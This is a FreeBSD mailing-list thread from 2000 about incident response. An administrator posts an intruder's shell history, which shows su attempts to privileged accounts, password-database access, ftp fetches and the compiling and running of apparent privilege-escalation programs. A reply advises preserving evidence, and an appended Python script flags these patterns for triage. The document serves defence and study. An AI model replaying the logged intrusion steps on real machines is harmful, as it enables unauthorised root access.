From owner-freebsd-questions  Mon Dec 18 12:47:39 2000
From owner-freebsd-questions@FreeBSD.ORG  Mon Dec 18 12:47:34 2000
Return-Path:
Delivered-To: freebsd-questions@freebsd.org
Received: from donkeykong.gpcc.itd.umich.edu (donkeykong.gpcc.itd.umich.edu [141.211.2.163])
	by hub.freebsd.org (Postfix) with ESMTP id A8ACA37B400
	for ; Mon, 18 Dec 2000 12:47:34 -0800 (PST)
Received: from tempest.gpcc.itd.umich.edu (smtp@tempest.gpcc.itd.umich.edu [141.211.2.155])
	by donkeykong.gpcc.itd.umich.edu (8.8.8/4.3-mailhub) with ESMTP id PAA07861;
	Mon, 18 Dec 2000 15:47:33 -0500 (EST)
Received: from localhost (timcm@localhost)
	by tempest.gpcc.itd.umich.edu (8.8.8/5.1-client) with ESMTP id PAA28355;
	Mon, 18 Dec 2000 15:47:32 -0500 (EST)
Date: Mon, 18 Dec 2000 15:47:32 -0500 (EST)
From: Tim McMillen
X-Sender: timcm@tempest.gpcc.itd.umich.edu
To: "Gerald T. Freymann"
Cc: Questions
Subject: Re: Hacker history file - OUCH
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

Do you know for sure it was an intruder?  Or was it just one of your users?
Either way, that doesn't look good.  I'm no security expert, but the programs
they compiled and ran could easily be backdoors to get in easily the next
time.  It's hard (for me) to tell how bad it is without knowing whether they
were successful in getting root privileges.  In the history file we don't see
the output of the command.  Nothing he did afterwards seems to require root
privileges, but if he had them then those programs could easily be backdoors.
I would consider the box compromised.  Is it still in use?

The best way to get the most information about an attack is to shut down and
halt the machine ASAP.  Then mount everything read only (perhaps on another
machine).  Then look around.  That way you won't overwrite possible clues.
Any disk access after the intruder is there can overwrite that, and that is
bad for evidence.

You may want to contact the administrators at the sites he ftp'd to, to alert
them and see if they can tell what those files were that he downloaded.

						Tim

On Mon, 18 Dec 2000, Gerald T. Freymann wrote:

>
> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
>
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts
> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd
> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...
> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit
>
> Anybody recognize what the intruder has set up?
>
> -Gerry
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
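The triage Tim does by eye above (privileged `su` attempts, poking at the password databases, ftp fetches, compile-run-`id` sequences, hidden `...` directories, `rm *` cleanup) can be run mechanically over a history file copied off a read-only mount. The script below is an added example for this thread, not code from either poster; `SAMPLE_HISTORY` is a constructed excerpt modelled on the quoted `.history`, and the account and file-name sets are assumptions a reader would tune to their own hosts.

```python
"""Triage a shell history from a hijacked account for the patterns seen in the quoted
.history: privileged su, password-db access, ftp fetches, compile/run/id, cleanup.
SAMPLE_HISTORY is a constructed excerpt modelled on that file, not the full history."""
import re
from collections import Counter

PRIV_ACCOUNTS = {"root", "toor", "operator", "wheel", "bin", "daemon"}
PASSWD_FILES = {"passwd", "master.passwd", "pwd.db", "spwd.db", "group", "ftpusers"}
VIEWERS = {"pico", "vi", "ee", "more", "less", "cat"}

SAMPLE_HISTORY = """\
more passwd
su toor
su operator
id
cd ...
ftp cih.edu.mx
cc -o bsd1 bsd-cron.c
./bsd1
id
rm *
"""

def triage(history_text):
    hits, compiled, prev = Counter(), set(), None
    # one argv list per non-empty history line
    for argv in filter(None, map(str.split, history_text.splitlines())):
        cmd, args = argv[0], argv[1:]
        if cmd == "su" and args and args[0] in PRIV_ACCOUNTS:
            hits["su_privileged"] += 1
        if cmd in VIEWERS and any(a.rsplit("/", 1)[-1] in PASSWD_FILES for a in args):
            hits["passwd_db_access"] += 1
        if cmd == "ftp" and args:
            hits["ftp_fetch"] += 1
        if cmd == "cc" and "-o" in args[:-1]:               # remember the output binary
            compiled.add("./" + args[args.index("-o") + 1])
        if cmd in compiled:
            hits["ran_compiled_binary"] += 1
        if cmd == "id" and prev and prev.startswith(("./", "/")):
            hits["id_after_exec"] += 1                      # checking whether it gave root
        if cmd == "cd" and args and re.fullmatch(r"\.{3,}", args[0].rsplit("/", 1)[-1]):
            hits["hidden_dotdir"] += 1
        if cmd == "rm" and "*" in args:
            hits["wildcard_rm"] += 1
        prev = cmd
    return hits

def assess(hits):  # Tim's call: privileged su plus run-and-check means compromised
    if hits["su_privileged"] and (hits["ran_compiled_binary"] or hits["id_after_exec"]):
        return "compromised"
    return "suspicious" if hits else "clean"
```

Like Tim's reading, the verdict is about the attempt pattern, not the outcome: the history never records whether `id` came back as uid 0, so a "compromised" result means image the disk and analyse it offline rather than keep using the box.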